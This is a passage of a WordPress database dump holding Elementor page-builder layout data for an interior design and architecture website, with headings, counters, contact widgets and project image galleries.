center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3692,4848,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3693,4848,'_elementor_pro_version','3.8.1'),(3694,4849,'_wp_page_template','elementor_header_footer'),(3695,4849,'_elementor_edit_mode','builder'),(3696,4849,'_elementor_template_type','wp-page'),(3697,4849,'_elementor_version','3.8.1'),(3698,4849,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a825c79\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7fa1a66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"296f069\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4812,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-1.jpg\"},{\"id\":4813,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-2.jpg\"},{\"id\":4814,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-3.jpg\"},{\"id\":4815,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-4.jpg\"},{\"id\":4816,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-5.jpg\"},{\"id\":4817,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-6.jpg\"},{\"id\":4818,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-7.jpg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"c010aae\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3699,4849,'_elementor_page_assets','a:0:{}'),(3700,4849,'_elementor_pro_version','3.8.1'),(3701,4849,'_elementor_css','a:6:{s:4:\"time\";i:1685436815;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3702,4850,'_wp_page_template','elementor_header_footer'),(3703,4850,'_elementor_edit_mode','builder'),(3704,4850,'_elementor_template_type','wp-page'),(3705,4850,'_elementor_version','3.8.1'),(3706,4850,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a825c79\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7fa1a66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"296f069\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4812,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-1.jpg\"},{\"id\":4813,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-2.jpg\"},{\"id\":4814,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-3.jpg\"},{\"id\":4815,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-4.jpg\"},{\"id\":4816,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-5.jpg\"},{\"id\":4817,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-6.jpg\"},{\"id\":4818,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-7.jpg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"c010aae\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3707,4850,'_elementor_page_assets','a:0:{}'),(3708,4850,'_elementor_pro_version','3.8.1'),(3709,4850,'_elementor_css','a:6:{s:4:\"time\";i:1685436815;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3710,4851,'_wp_page_template','elementor_header_footer'),(3711,4851,'_elementor_edit_mode','builder'),(3712,4851,'_elementor_template_type','wp-page'),(3713,4851,'_elementor_version','3.8.1'),(3714,4851,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"description\":\"Kami memiliki keyakinan bahwa rumah adalah \\u201cLiving Space\\u201d atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a825c79\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7fa1a66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"296f069\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4812,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-1.jpg\"},{\"id\":4813,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-2.jpg\"},{\"id\":4814,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-3.jpg\"},{\"id\":4815,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-4.jpg\"},{\"id\":4816,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-5.jpg\"},{\"id\":4817,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-6.jpg\"},{\"id\":4818,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-7.jpg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"c010aae\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3715,4851,'_elementor_page_assets','a:0:{}'),(3716,4851,'_elementor_pro_version','3.8.1'),(3717,4851,'_elementor_css','a:6:{s:4:\"time\";i:1685436815;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3718,4852,'_wp_page_template','elementor_header_footer'),(3719,4852,'_elementor_edit_mode','builder'),(3720,4852,'_elementor_template_type','wp-page'),(3721,4852,'_elementor_version','3.8.1'),(3722,4852,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b46d948\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d86197\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fe2cde6\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4825,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-1.jpg\"},{\"id\":4826,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-2.jpg\"},{\"id\":4827,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-3.jpg\"}],\"galleries\":[{\"gallery_title\":\"New 